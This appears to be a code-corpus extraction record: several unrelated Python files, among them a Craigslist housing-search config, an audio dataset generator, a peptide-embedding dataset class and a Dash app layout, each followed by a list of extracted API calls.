] | [((3912, 3972), 'gin.query_parameter', 'gin.query_parameter', (['f"""{gin_annealer_cls}.source_metric_key"""'], {}), "(f'{gin_annealer_cls}.source_metric_key')\n", (3931, 3972), False, 'import gin\n'), ((4290, 4346), 'gin.query_parameter', 'gin.query_parameter', (['f"""{gin_annealer_cls}.fit_threshold"""'], {}), "(f'{gin_annealer_cls}.fit_threshold')\n", (4309, 4346), False, 'import gin\n'), ((4425, 4563), 'logging.info', 'logging.info', (['f"""Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp[\'first_not_good\']}"""'], {}), '(\n f"Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp[\'first_not_good\']}"\n )\n', (4437, 4563), False, 'import logging\n'), ((9679, 9733), 'gin.query_parameter', 'gin.query_parameter', (['"""ThresholdAnnealer.fit_threshold"""'], {}), "('ThresholdAnnealer.fit_threshold')\n", (9698, 9733), False, 'import gin\n'), ((829, 872), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_fit_loss_key'], {}), '(epoch_info, source_fit_loss_key)\n', (839, 872), False, 'from sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((882, 961), 'logging.info', 'logging.info', (['f"""Threshold detector found non-sparse loss {non_sparse_fit_loss}"""'], {}), "(f'Threshold detector found non-sparse loss {non_sparse_fit_loss}')\n", (894, 961), False, 'import logging\n'), ((2030, 2045), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2043, 2045), False, 'import torch\n'), ((4005, 4046), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_metric_key'], {}), '(epoch_info, source_metric_key)\n', (4015, 4046), False, 'from sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((6654, 6695), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_metric_key'], {}), '(epoch_info, source_metric_key)\n', (6664, 6695), False, 'from 
sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((6790, 6857), 'logging.info', 'logging.info', (['f"""Annealer found loss {fit_loss} {source_metric_key}"""'], {}), "(f'Annealer found loss {fit_loss} {source_metric_key}')\n", (6802, 6857), False, 'import logging\n'), ((1677, 1696), 'gin.unlock_config', 'gin.unlock_config', ([], {}), '()\n', (1694, 1696), False, 'import gin\n'), ((1711, 1768), 'gin.bind_parameter', 'gin.bind_parameter', (['gin_variable', "temp['suggested_hyper']"], {}), "(gin_variable, temp['suggested_hyper'])\n", (1729, 1768), False, 'import gin\n'), ((7455, 7500), 'logging.warning', 'logging.warning', (['f"""Freezing finished at {i}!"""'], {}), "(f'Freezing finished at {i}!')\n", (7470, 7500), False, 'import logging\n'), ((9327, 9375), 'logging.warning', 'logging.warning', (['f"""Starting model freeze at {i}"""'], {}), "(f'Starting model freeze at {i}')\n", (9342, 9375), False, 'import logging\n'), ((3231, 3279), 'logging.info', 'logging.info', (['f"""Turn on feature {fout} <- {fin}"""'], {}), "(f'Turn on feature {fout} <- {fin}')\n", (3243, 3279), False, 'import logging\n'), ((5239, 5308), 'logging.info', 'logging.info', (['f"""Resetting switch parameter with shape {p.data.shape}"""'], {}), "(f'Resetting switch parameter with shape {p.data.shape}')\n", (5251, 5308), False, 'import logging\n'), ((4908, 4950), 'logging.info', 'logging.info', (['f"""Resetting parameter {key}"""'], {}), "(f'Resetting parameter {key}')\n", (4920, 4950), False, 'import logging\n'), ((5015, 5042), 'torch.nn.init.zeros_', 'torch.nn.init.zeros_', (['param'], {}), '(param)\n', (5035, 5042), False, 'import torch\n'), ((5095, 5131), 'torch.nn.init.xavier_uniform_', 'torch.nn.init.xavier_uniform_', (['param'], {}), '(param)\n', (5124, 5131), False, 'import torch\n')] |
import os
# Hard requirements a listing must satisfy before it is considered at all.
FILTERS = {
    'min_bathrooms': 1,
    'min_bedrooms': 3
}
## Location preferences
# The Craigslist site you want to search on.
# For instance, https://sfbay.craigslist.org is SF and the Bay Area.
# You only need the beginning of the URL.
CRAIGSLIST_SITE = 'sfbay'
# What Craigslist subdirectories to search on.
# For instance, https://sfbay.craigslist.org/eby/ is the East Bay, and https://sfbay.craigslist.org/sfc/ is San Francisco.
# You only need the last three letters of the URLs.
AREAS = ["sfc"]
# A list of neighborhoods and coordinates that you want to look for apartments in. Any listing that has coordinates
# attached will be checked to see which area it is in. If there's a match, it will be annotated with the area
# name. If no match, the neighborhood field, which is a string, will be checked to see if it matches
# anything in NEIGHBORHOODS.
# Each value is a bounding box: [[south-west lat, lon], [north-east lat, lon]].
BOXES = {
    "mission": [
        [37.747808, -122.429121],
        [37.772749, -122.407797]
    ]
}
# A list of neighborhood names to look for in the Craigslist neighborhood name field. If a listing doesn't fall into
# one of the boxes you defined, it will be checked to see if the neighborhood name it was listed under matches one
# of these. This is less accurate than the boxes, because it relies on the owner to set the right neighborhood,
# but it also catches listings that don't have coordinates (many listings are missing this info).
NEIGHBORHOODS = ["berkeley north", "berkeley", "rockridge", "adams point", "oakland lake merritt", "cow hollow", "piedmont", "pac hts", "pacific heights", "lower haight", "inner sunset", "outer sunset", "presidio", "palo alto", "richmond / seacliff", "haight ashbury", "alameda", "twin peaks", "noe valley", "bernal heights", "glen park", "sunset", "mission district", "potrero hill", "dogpatch"]
## Transit preferences
# The farthest you want to live from a transit stop.
MAX_TRANSIT_DIST = 2  # kilometers
# Transit stations you want to check against. Every coordinate here will be checked against each listing,
# and the closest station name will be added to the result and posted into Slack.
# NOTE: the dict previously contained "18th & Dolores" twice; the first entry
# ([37.76125, -122.42585]) was silently shadowed by the second and has been
# removed (no behavioral change -- dict literals keep the last duplicate).
GOOGLE_STOPS = {
    "<NAME> @ Union": [37.798656,-122.424156],
    "<NAME> @ Sacramento": [37.791363,-122.422707],
    "Columbus @ Powell": [37.800591,-122.410721],
    "San Francisco Office": [37.791172,-122.389923],
    "Soma": [37.777119,-122.395134],
    "Civic Center": [37.778316,-122.414398],
    "Stanyan @ Frederick": [37.766594,-122.45295],
    "Haight @ Divisadero": [37.771225,-122.436745],
    "Hayes @ Steiner": [37.775612,-122.432495],
    "24th @ Castro": [37.75124,-122.433762],
    "24th @ Church": [37.751598,-122.427704],
    "30th @ Dolores": [37.742188,-122.424614],
    "24th @ Valencia": [37.752033,-122.420387],
    "Park Presido @ Geary": [37.780266,-122.47245],
    "19th @ Kirkham": [37.759975,-122.476974],
    "19th @ Taraval": [37.743191,-122.475822],
    "<NAME> BART": [37.733131,-122.434143],
    "San Francisco Office Pickup": [37.789299,-122.388672],
    "Valencia @ 24th": [37.751945,-122.420769],
    "14th and Market (Late AM Quad, Sweep, & Evening Drop Off)": [37.768764,-122.427574],
    "18th & Castro": [37.760788,-122.434914],
    "201 Toland Street": [37.745743,-122.397133],
    "18th & Dolores": [37.761444,-122.426628],
    "Jackson Playground": [37.765011,-122.399948],
    "Potrero & 18th": [37.761635,-122.407318],
    "Potrero & 23rd": [37.753986,-122.406586],
    "Lombard @ Pierce": [37.799282,-122.439499],
    "Market @ Dolores": [37.768872,-122.427169]
}
FB_STOPS = {
    "SOMA-1": [37.785083,-122.419667],
    "SOMA-2": [37.778306,-122.414389],
    "SOMA-3": [37.778056,-122.397056],
    "SOMA-4": [37.774417,-122.404444],
    "Mission-1": [37.76427,-122.430571],
    "Mission-2": [37.748643,-122.420834],
    "Mission-3": [37.748095,-122.418281],
    "Mission-4": [37.751702,-122.427492],
    "Mission-5": [37.765028,-122.419278],
    "Hayes Valley-1": [37.773118,-122.44628],
    "Hayes Valley-2": [37.777639,-122.42325],
    "Hayes Valley-3": [37.773778,-122.432083],
    "Hayes Valley-4": [37.780352,-122.438784],
    "Hayes Valley-5": [37.784972,-122.424667],
    "Portero-1": [37.765028,-122.399861],
    "Portero-2": [37.761889,-122.41025],
    "Portero-3": [37.755722,-122.409528]
}
## Search type preferences
# The Craigslist section underneath housing that you want to search in.
# For instance, https://sfbay.craigslist.org/search/apa find apartments for rent.
# https://sfbay.craigslist.org/search/sub finds sublets.
# You only need the last 3 letters of the URLs.
CRAIGSLIST_HOUSING_SECTION = 'sub'
## System settings
# How long we should sleep between scrapes of Craigslist.
# Too fast may get rate limited.
# Too slow may miss listings.
SLEEP_INTERVAL = 20 * 60  # 20 minutes
# Which slack channel to post the listings into.
SLACK_CHANNEL = "#housing"
# The token that allows us to connect to slack.
# Should be put in private.py, or set as an environment variable.
SLACK_TOKEN = os.getenv('SLACK_TOKEN', "")
# Office location used as a commute reference point.
# (Removed the stray trailing semicolon -- not idiomatic Python, flake8 E703.)
OFFICE_ADDRESS = '1965 Charleston Road Mountain View, CA 94043'
# Any private settings are imported here.
try:
    from private import *
except Exception:
    pass
# Any external private settings are imported from here.
try:
    from config.private import *
except Exception:
    pass
"os.getenv"
] | [((5037, 5065), 'os.getenv', 'os.getenv', (['"""SLACK_TOKEN"""', '""""""'], {}), "('SLACK_TOKEN', '')\n", (5046, 5065), False, 'import os\n')] |
import os
import scipy.io.wavfile
import matplotlib.pyplot as plt
import numpy as np
import os
import random
'''
Create a random dataset from notes whose frequencies are always in phase.
Frequencies are octave-related (e.g. 440, 880, 1320 Hz).
'''
fs = 16000  # sampling rate in Hz

# Pre-load the recorded notes once at import time; scipy returns
# (rate, data) tuples and only the sample data (index 1) is kept.
_NOTE_NAMES = ('a440', 'c531', 'e667', 'a880', 'c1056', 'e1320', 'a1760')
x1, x2, x3, x4, x5, x6, x7 = (
    scipy.io.wavfile.read('corpus/Analysis/%s.wav' % note)[1]
    for note in _NOTE_NAMES
)
# Categories
a = [0]
b = [1]
c = [2]
def createRandomSequence():
    """Draw a random category sequence and matching per-category durations.

    Returns a pair ``(categories, durations)`` where ``categories`` holds
    5-10 random category indices in [0, 6] and ``durations`` holds the
    corresponding lengths in samples (multiples of 1818, between 1x and 10x).
    """
    base_len = 1818
    n_items = random.randint(5, 10)
    categories = []
    durations = []
    for _ in range(n_items):
        categories.append(random.randint(0, 6))
        durations.append(base_len * random.randint(1, 10))
    return categories, durations
def genFile(sequence, sampleSequence, c):
    """Write the sample-aligned label sequence for example ``c`` to a text file.

    Each category ``sequence[i]`` is repeated ``sampleSequence[i]`` times so
    labels line up one-per-sample with the generated audio. Output goes to
    ``corpus/panFluteBigDataset/lc_train<c>.txt``, one label per line,
    formatted as "<label>,".
    """
    fullSequence = []
    for value, length in zip(sequence, sampleSequence):
        fullSequence.extend(int(length) * [value])
    out_path = os.path.join('corpus', 'panFluteBigDataset', 'lc_train%s.txt' % c)
    # Context manager guarantees the handle is closed even if a write fails
    # (the original left the file open on error).
    with open(out_path, 'w') as out_file:
        for item in fullSequence:
            out_file.write('%i,\n' % item)
def case(x):
    """Map a category index (0-6) to its pre-loaded waveform (x1..x7)."""
    signals = {index: signal
               for index, signal in enumerate((x1, x2, x3, x4, x5, x6, x7))}
    return signals[x]
def genSignals(sequence, sampleSequence, c):
    """Render ``sequence`` as audio and write it to a wav file.

    Each category is mapped to its waveform via ``case`` and truncated to
    ``sampleSequence[i]`` samples; the snippets are concatenated, peak
    normalized, and a small amount of Gaussian noise is added before writing
    ``corpus/panFluteBigDataset7freq/lc_train<c>.wav``.
    """
    # scipy.hstack was a deprecated NumPy re-export that has been removed
    # from the top-level scipy namespace; use numpy directly instead.
    segments = [case(category)[:n_samples]
                for category, n_samples in zip(sequence, sampleSequence)]
    y = np.concatenate(segments)
    # Peak-normalize (np.max(y) == y[np.argmax(y)]).
    y = y / np.max(y)
    noise = 0.01 * np.random.normal(0, 1, len(y))
    y = y + noise
    scipy.io.wavfile.write(
        os.path.join('corpus', 'panFluteBigDataset7freq', 'lc_train%s.wav' % c),
        fs, y)
def main():
    """Generate 100 random sequence examples and write them as wav files."""
    for example_id in range(100):
        categories, durations = createRandomSequence()
        genSignals(categories, durations, example_id)


if __name__ == '__main__':
    main()
| [
"numpy.argmax",
"numpy.asarray",
"os.path.join",
"random.randint"
] | [((773, 794), 'random.randint', 'random.randint', (['(5)', '(10)'], {}), '(5, 10)\n', (787, 794), False, 'import random\n'), ((926, 946), 'random.randint', 'random.randint', (['(0)', '(6)'], {}), '(0, 6)\n', (940, 946), False, 'import random\n'), ((1389, 1455), 'os.path.join', 'os.path.join', (['"""corpus"""', '"""panFluteBigDataset"""', "('lc_train%s.txt' % c)"], {}), "('corpus', 'panFluteBigDataset', 'lc_train%s.txt' % c)\n", (1401, 1455), False, 'import os\n'), ((2167, 2180), 'numpy.asarray', 'np.asarray', (['y'], {}), '(y)\n', (2177, 2180), True, 'import numpy as np\n'), ((2216, 2287), 'os.path.join', 'os.path.join', (['"""corpus"""', '"""panFluteBigDataset7freq"""', "('lc_train%s.wav' % c)"], {}), "('corpus', 'panFluteBigDataset7freq', 'lc_train%s.wav' % c)\n", (2228, 2287), False, 'import os\n'), ((1039, 1060), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (1053, 1060), False, 'import random\n'), ((2097, 2109), 'numpy.argmax', 'np.argmax', (['y'], {}), '(y)\n', (2106, 2109), True, 'import numpy as np\n')] |
import unittest
import game.engine.dice as dice
class DiceRollTest(unittest.TestCase):
    """Tests for game.engine.dice.roll."""

    def test_dice_roll(self):
        """Every roll must land in the inclusive range 1-6.

        A single sample could pass by accident; repeat the roll many times
        so out-of-range values are very likely to be caught.
        """
        for _ in range(100):
            roll = dice.roll()
            self.assertGreaterEqual(roll, 1)
            self.assertLessEqual(roll, 6)
| [
"game.engine.dice.roll"
] | [((134, 145), 'game.engine.dice.roll', 'dice.roll', ([], {}), '()\n', (143, 145), True, 'import game.engine.dice as dice\n')] |
""" This module contains a pytorch dataset for learning peptide embeddings.
In particular, each "instance" of the dataset comprises two peptide sequences,
as well as the sNebula similarity between them. The sNebula distance reflects
the BLOSSUM similarity transformed from 0 to 1.
"""
import logging
# Module-level logger, named after this module per logging convention.
logger = logging.getLogger(__name__)
import numpy as np
import torch
import torch.utils.data
from lifesci.peptide_dataset import PeptideDataset
import lifesci.sequence_similarity_utils as sequence_similarity_utils
import pyllars.string_utils as string_utils
from typing import NamedTuple, Optional
class PeptideEncoderTrainingDatasetItem(NamedTuple):
    """A single training instance: two peptides, their integer encodings,
    and the sNebula similarity score between them."""
    # raw amino-acid strings
    aa_sequence_xs: str
    aa_sequence_ys: str
    # integer-encoded, padded/truncated to max_len
    encoded_xs: torch.IntTensor
    encoded_ys: torch.IntTensor
    # sNebula similarity between the two sequences
    similarities: torch.FloatTensor
# Default constructor arguments for PeptideEncoderTrainingDataset.
_DEFAULT_SEQUENCE_COLUMN = 'sequence'
_DEFAULT_SEED = 8675309  # arbitrary fixed seed for reproducible sampling
_DEFAULT_NAME = "PeptideEncoderTrainingDataset"
_DEFAULT_MAX_LEN = 25  # peptides longer than this are truncated
class PeptideEncoderTrainingDataset(torch.utils.data.Dataset):
    """ Generate training samples from a list of amino acid sequences
    In particular, this class reads a list of peptides from `dataset_path`. It
    then draws pairs of peptides from the list and calculates the sNebula
    similarity score between them. Thus, each item from this dataset consists
    of two peptide sequences and the similarity score.
    In case the dataset object should be used for validation, the
    `is_validation` flag can be set to `True`. In that case, a fixed set of
    pairings will be selected for the peptides so that performance metrics are
    constant from iteration to iteration. Otherwise (i.e., for training), one
    member of each pair is randomly sampled.
    Parameters
    ----------
    dataset_path : str
        The path to the dataset. It should be compatible with `pandas.read_csv`
        and contain a column named `sequence_column` which includes the
        sequences. Other columns are ignored.
    aa_encoding_map : pyllars.string_utils.encoding_map_type
        A mapping from each amino acid to its integer index.
        N.B. This should **not** be a one-hot representation, but, as stated,
        the integer index. Further, the padding character must be "-".
    is_validation : bool
        Whether the dataset will be used for validation (or testing)
    sequence_column : str
        The name of the column which contains the amino acid sequences
    max_len : int
        The maximum length for a peptide. Peptides longer than this will be
        truncated, and shorter peptides will be padded to this length.
    seed : int
        Seed for the random number generator. This is used to randomly select
        the second sequence in each of the instances.
    name : str
        A name for the dataset instance. This is mostly used for logging.
    """
    def __init__(self,
            dataset_path:str,
            aa_encoding_map:string_utils.encoding_map_type,
            is_validation:bool=False,
            sequence_column:str=_DEFAULT_SEQUENCE_COLUMN,
            max_len:int=_DEFAULT_MAX_LEN,
            seed:int=_DEFAULT_SEED,
            name:str=_DEFAULT_NAME):
        self.aa_encoding_map = aa_encoding_map
        self.is_validation = is_validation
        self.sequence_column = sequence_column
        self.max_len = max_len
        self.seed = seed
        self.name = name
        # dedicated generator so the training-time pair sampling is
        # reproducible given `seed`
        self.rng = np.random.default_rng(self.seed)
        df_peptides = PeptideDataset.load(dataset_path, sequence_column, filters=["standard_aa_only"])
        self.aa_sequences = df_peptides[self.sequence_column].values
        # integer-encode all peptides up front, padded/truncated to max_len
        self.encoded_aa_sequences = string_utils.encode_all_sequences(
            sequences=self.aa_sequences,
            encoding_map=self.aa_encoding_map,
            maxlen=self.max_len,
            pad_value='-',
            same_length=False
        )
        self.encoded_aa_sequences = self.encoded_aa_sequences.astype(int)
        # NOTE(review): the fixed validation pairing uses the *global* numpy
        # RNG (np.random.permutation), so it is not controlled by `seed` --
        # confirm whether this is intentional.
        if self.is_validation:
            self._matching_validation_item = np.random.permutation(len(self.aa_sequences))
    def log(self, msg:str, level:int=logging.INFO) -> None:
        """ Log `msg` using `level` using the module-level logger """
        msg = "[{}] {}".format(self.name, msg)
        logger.log(level, msg)
    def __len__(self) -> int:
        return len(self.aa_sequences)
    def __getitem__(self, idx) -> PeptideEncoderTrainingDatasetItem:
        x = idx
        # and choose an appropriate matching index based on the dataset status
        if self.is_validation:
            y = self._matching_validation_item[idx]
        else:
            # select the second sequence randomly
            y = self.rng.integers(low=0, high=len(self), size=1)
            # the rng returns an array...
            y = y[0]
        encoded_xs = self.encoded_aa_sequences[x]
        encoded_ys = self.encoded_aa_sequences[y]
        peptide_xs = self.aa_sequences[x]
        peptide_ys = self.aa_sequences[y]
        # the regression target: BLOSUM-based similarity mapped to [0, 1]
        similarities = sequence_similarity_utils.get_snebula_score(peptide_xs, peptide_ys)
        encoded_xs = torch.as_tensor(encoded_xs, dtype=torch.long)
        encoded_ys = torch.as_tensor(encoded_ys, dtype=torch.long)
        similarities = torch.as_tensor(similarities, dtype=torch.float32)
        ret = PeptideEncoderTrainingDatasetItem(
            peptide_xs, peptide_ys, encoded_xs, encoded_ys, similarities
        )
        return ret
    def get_trimmed_peptide_lengths(self, peptides) -> np.ndarray:
        """ Extract the trimmed length of the given peptides, which accounts for max_len """
        peptide_lengths = [len(p) for p in peptides]
        trimmed_peptide_lengths = np.clip(peptide_lengths, 0, self.max_len)
        return trimmed_peptide_lengths
    @classmethod
    def load(clazz,
            dataset_path:Optional[str],
            aa_encoding_map:string_utils.encoding_map_type,
            is_validation:bool,
            name:str) -> Optional["PeptideEncoderTrainingDataset"]:
        """ Load the dataset given by `key` in `self.config`
        Additionally, `name` will be used for the name of the dataset.
        Parameters
        ----------
        dataset_path : typing.Optional[str]
            The path to the dataset
        aa_encoding_map : pyllars.string_utils.encoding_map_type
            A mapping from each amino acid to its integer index.
        is_validation : bool
            Whether the dataset will be used for validation (or testing)
        name : str
            The name for the dataset, if it is in the config file. Example:
            "TrainingSet"
        Returns
        -------
        dataset : typing.Optional[AAEncoderDataset]
            If `key` is in `self.config`, then `dataset` will be the dataset
            object based on that file. Otherwise, this function returns `None`.
        """
        dataset = None
        if dataset_path is not None:
            dataset = PeptideEncoderTrainingDataset (
                dataset_path=dataset_path,
                aa_encoding_map=aa_encoding_map,
                is_validation=is_validation,
                name=name
            )
        return dataset
| [
"logging.getLogger",
"numpy.clip",
"pyllars.string_utils.encode_all_sequences",
"torch.as_tensor",
"numpy.random.default_rng",
"lifesci.sequence_similarity_utils.get_snebula_score",
"lifesci.peptide_dataset.PeptideDataset.load"
] | [((310, 337), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (327, 337), False, 'import logging\n'), ((3411, 3443), 'numpy.random.default_rng', 'np.random.default_rng', (['self.seed'], {}), '(self.seed)\n', (3432, 3443), True, 'import numpy as np\n'), ((3467, 3552), 'lifesci.peptide_dataset.PeptideDataset.load', 'PeptideDataset.load', (['dataset_path', 'sequence_column'], {'filters': "['standard_aa_only']"}), "(dataset_path, sequence_column, filters=['standard_aa_only']\n )\n", (3486, 3552), False, 'from lifesci.peptide_dataset import PeptideDataset\n'), ((3654, 3816), 'pyllars.string_utils.encode_all_sequences', 'string_utils.encode_all_sequences', ([], {'sequences': 'self.aa_sequences', 'encoding_map': 'self.aa_encoding_map', 'maxlen': 'self.max_len', 'pad_value': '"""-"""', 'same_length': '(False)'}), "(sequences=self.aa_sequences, encoding_map\n =self.aa_encoding_map, maxlen=self.max_len, pad_value='-', same_length=\n False)\n", (3687, 3816), True, 'import pyllars.string_utils as string_utils\n'), ((5023, 5090), 'lifesci.sequence_similarity_utils.get_snebula_score', 'sequence_similarity_utils.get_snebula_score', (['peptide_xs', 'peptide_ys'], {}), '(peptide_xs, peptide_ys)\n', (5066, 5090), True, 'import lifesci.sequence_similarity_utils as sequence_similarity_utils\n'), ((5113, 5158), 'torch.as_tensor', 'torch.as_tensor', (['encoded_xs'], {'dtype': 'torch.long'}), '(encoded_xs, dtype=torch.long)\n', (5128, 5158), False, 'import torch\n'), ((5180, 5225), 'torch.as_tensor', 'torch.as_tensor', (['encoded_ys'], {'dtype': 'torch.long'}), '(encoded_ys, dtype=torch.long)\n', (5195, 5225), False, 'import torch\n'), ((5249, 5299), 'torch.as_tensor', 'torch.as_tensor', (['similarities'], {'dtype': 'torch.float32'}), '(similarities, dtype=torch.float32)\n', (5264, 5299), False, 'import torch\n'), ((5700, 5741), 'numpy.clip', 'np.clip', (['peptide_lengths', '(0)', 'self.max_len'], {}), '(peptide_lengths, 0, self.max_len)\n', (5707, 
5741), True, 'import numpy as np\n')] |
"""Combines all components
The `sidebar` component combines all the inputs while other components potentially
have callbacks.
To add or remove components, adjust the `setup`.
If callbacks are present, also adjust `CALLBACK_INPUTS`, `CALLBACK_OUTPUTS` and
`callback_body`.
"""
from collections import OrderedDict
from dash_bootstrap_components import Row, Col
from dash_bootstrap_components.themes import BOOTSTRAP
from dash_html_components import Script, Div
from penn_chime.defaults import Constants
from penn_chime.models import SimSirModel
from chime_dash.app.components.base import Component, HTMLComponentError
from chime_dash.app.components.sidebar import Sidebar
from chime_dash.app.components.header import Header
from chime_dash.app.components.intro import Intro, ToolDetails
from chime_dash.app.components.additions import Additions
from chime_dash.app.components.visualizations import Visualizations
from chime_dash.app.components.definitions import Definitions
from chime_dash.app.components.footer import Footer
from chime_dash.app.components.navbar import Navbar
class Body(Component):
"""
"""
external_stylesheets = [
"https://www1.pennmedicine.org/styles/shared/penn-medicine-header.css",
BOOTSTRAP,
]
def __init__(self, language, defaults):
"""
"""
super().__init__(language, defaults)
self.components = OrderedDict(
sidebar=Sidebar(language, defaults),
header=Header(language, defaults),
intro=Intro(language, defaults),
tool_details=ToolDetails(language, defaults),
visualizations=Visualizations(language, defaults),
additions=Additions(language, defaults),
definitions=Definitions(language, defaults),
footer=Footer(language, defaults),
navbar=Navbar(language, defaults),
)
self.callback_outputs = []
self.callback_inputs = OrderedDict()
self.callback_keys = []
for component in self.components.values():
self.callback_outputs += component.callback_outputs
self.callback_inputs.update(component.callback_inputs)
def get_html(self):
"""Glues individual setup components together
"""
return Div(
children=self.components["navbar"].html
+ [
Row(
children=[
Col(
id="sidebar",
children=self.components["sidebar"].html,
width=3,
className="mt-4",
),
Col(width=1),
Col(
self.components["header"].html
+ self.components["intro"].html
+ self.components["tool_details"].html
+ self.components["visualizations"].html
+ self.components["additions"].html
+ self.components["definitions"].html
+ self.components["footer"].html,
width=8,
className="mt-4",
),
],
className="container",
),
]
)
def callback(self, *args, **kwargs):
"""
"""
kwargs = dict(zip(self.callback_inputs, args))
pars = self.components["sidebar"].parse_form_parameters(**kwargs)
kwargs["model"] = SimSirModel(pars)
kwargs["pars"] = pars
callback_returns = []
for component in self.components.values():
try:
callback_returns += component.callback(**kwargs)
except Exception as error:
raise HTMLComponentError(component, error)
return callback_returns
| [
"collections.OrderedDict",
"chime_dash.app.components.sidebar.Sidebar",
"chime_dash.app.components.intro.Intro",
"chime_dash.app.components.additions.Additions",
"chime_dash.app.components.visualizations.Visualizations",
"chime_dash.app.components.definitions.Definitions",
"chime_dash.app.components.int... | [((1954, 1967), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1965, 1967), False, 'from collections import OrderedDict\n'), ((3618, 3635), 'penn_chime.models.SimSirModel', 'SimSirModel', (['pars'], {}), '(pars)\n', (3629, 3635), False, 'from penn_chime.models import SimSirModel\n'), ((1432, 1459), 'chime_dash.app.components.sidebar.Sidebar', 'Sidebar', (['language', 'defaults'], {}), '(language, defaults)\n', (1439, 1459), False, 'from chime_dash.app.components.sidebar import Sidebar\n'), ((1480, 1506), 'chime_dash.app.components.header.Header', 'Header', (['language', 'defaults'], {}), '(language, defaults)\n', (1486, 1506), False, 'from chime_dash.app.components.header import Header\n'), ((1526, 1551), 'chime_dash.app.components.intro.Intro', 'Intro', (['language', 'defaults'], {}), '(language, defaults)\n', (1531, 1551), False, 'from chime_dash.app.components.intro import Intro, ToolDetails\n'), ((1578, 1609), 'chime_dash.app.components.intro.ToolDetails', 'ToolDetails', (['language', 'defaults'], {}), '(language, defaults)\n', (1589, 1609), False, 'from chime_dash.app.components.intro import Intro, ToolDetails\n'), ((1638, 1672), 'chime_dash.app.components.visualizations.Visualizations', 'Visualizations', (['language', 'defaults'], {}), '(language, defaults)\n', (1652, 1672), False, 'from chime_dash.app.components.visualizations import Visualizations\n'), ((1696, 1725), 'chime_dash.app.components.additions.Additions', 'Additions', (['language', 'defaults'], {}), '(language, defaults)\n', (1705, 1725), False, 'from chime_dash.app.components.additions import Additions\n'), ((1751, 1782), 'chime_dash.app.components.definitions.Definitions', 'Definitions', (['language', 'defaults'], {}), '(language, defaults)\n', (1762, 1782), False, 'from chime_dash.app.components.definitions import Definitions\n'), ((1803, 1829), 'chime_dash.app.components.footer.Footer', 'Footer', (['language', 'defaults'], {}), '(language, 
defaults)\n', (1809, 1829), False, 'from chime_dash.app.components.footer import Footer\n'), ((1850, 1876), 'chime_dash.app.components.navbar.Navbar', 'Navbar', (['language', 'defaults'], {}), '(language, defaults)\n', (1856, 1876), False, 'from chime_dash.app.components.navbar import Navbar\n'), ((3891, 3927), 'chime_dash.app.components.base.HTMLComponentError', 'HTMLComponentError', (['component', 'error'], {}), '(component, error)\n', (3909, 3927), False, 'from chime_dash.app.components.base import Component, HTMLComponentError\n'), ((2437, 2527), 'dash_bootstrap_components.Col', 'Col', ([], {'id': '"""sidebar"""', 'children': "self.components['sidebar'].html", 'width': '(3)', 'className': '"""mt-4"""'}), "(id='sidebar', children=self.components['sidebar'].html, width=3,\n className='mt-4')\n", (2440, 2527), False, 'from dash_bootstrap_components import Row, Col\n'), ((2688, 2700), 'dash_bootstrap_components.Col', 'Col', ([], {'width': '(1)'}), '(width=1)\n', (2691, 2700), False, 'from dash_bootstrap_components import Row, Col\n'), ((2726, 3026), 'dash_bootstrap_components.Col', 'Col', (["(self.components['header'].html + self.components['intro'].html + self.\n components['tool_details'].html + self.components['visualizations'].\n html + self.components['additions'].html + self.components[\n 'definitions'].html + self.components['footer'].html)"], {'width': '(8)', 'className': '"""mt-4"""'}), "(self.components['header'].html + self.components['intro'].html + self.\n components['tool_details'].html + self.components['visualizations'].\n html + self.components['additions'].html + self.components[\n 'definitions'].html + self.components['footer'].html, width=8,\n className='mt-4')\n", (2729, 3026), False, 'from dash_bootstrap_components import Row, Col\n')] |
"""crwal_and_scrap trying to gathering news with web scrawl"""
from crwal_and_scrap.main import main
main()
| [
"crwal_and_scrap.main.main"
] | [((103, 109), 'crwal_and_scrap.main.main', 'main', ([], {}), '()\n', (107, 109), False, 'from crwal_and_scrap.main import main\n')] |
from dataclasses import dataclass, field
from typing import List
__NAMESPACE__ = "a"
@dataclass
class Nametest:
choice: List[object] = field(
default_factory=list,
metadata={
"type": "Elements",
"choices": (
{
"name": "_ele",
"type": str,
"namespace": "a",
},
{
"name": "_-",
"type": str,
"namespace": "a",
},
{
"name": "_.",
"type": str,
"namespace": "a",
},
{
"name": "_9",
"type": str,
"namespace": "a",
},
{
"name": "___",
"type": str,
"namespace": "a",
},
{
"name": "a_a",
"type": str,
"namespace": "a",
},
{
"name": "a.a",
"type": str,
"namespace": "a",
},
{
"name": "ele",
"type": str,
"namespace": "a",
},
),
}
)
@dataclass
class Root(Nametest):
class Meta:
name = "root"
namespace = "a"
| [
"dataclasses.field"
] | [((142, 620), 'dataclasses.field', 'field', ([], {'default_factory': 'list', 'metadata': "{'type': 'Elements', 'choices': ({'name': '_ele', 'type': str, 'namespace':\n 'a'}, {'name': '_-', 'type': str, 'namespace': 'a'}, {'name': '_.',\n 'type': str, 'namespace': 'a'}, {'name': '_9', 'type': str, 'namespace':\n 'a'}, {'name': '___', 'type': str, 'namespace': 'a'}, {'name': 'a_a',\n 'type': str, 'namespace': 'a'}, {'name': 'a.a', 'type': str,\n 'namespace': 'a'}, {'name': 'ele', 'type': str, 'namespace': 'a'})}"}), "(default_factory=list, metadata={'type': 'Elements', 'choices': ({\n 'name': '_ele', 'type': str, 'namespace': 'a'}, {'name': '_-', 'type':\n str, 'namespace': 'a'}, {'name': '_.', 'type': str, 'namespace': 'a'},\n {'name': '_9', 'type': str, 'namespace': 'a'}, {'name': '___', 'type':\n str, 'namespace': 'a'}, {'name': 'a_a', 'type': str, 'namespace': 'a'},\n {'name': 'a.a', 'type': str, 'namespace': 'a'}, {'name': 'ele', 'type':\n str, 'namespace': 'a'})})\n", (147, 620), False, 'from dataclasses import dataclass, field\n')] |
import pprint
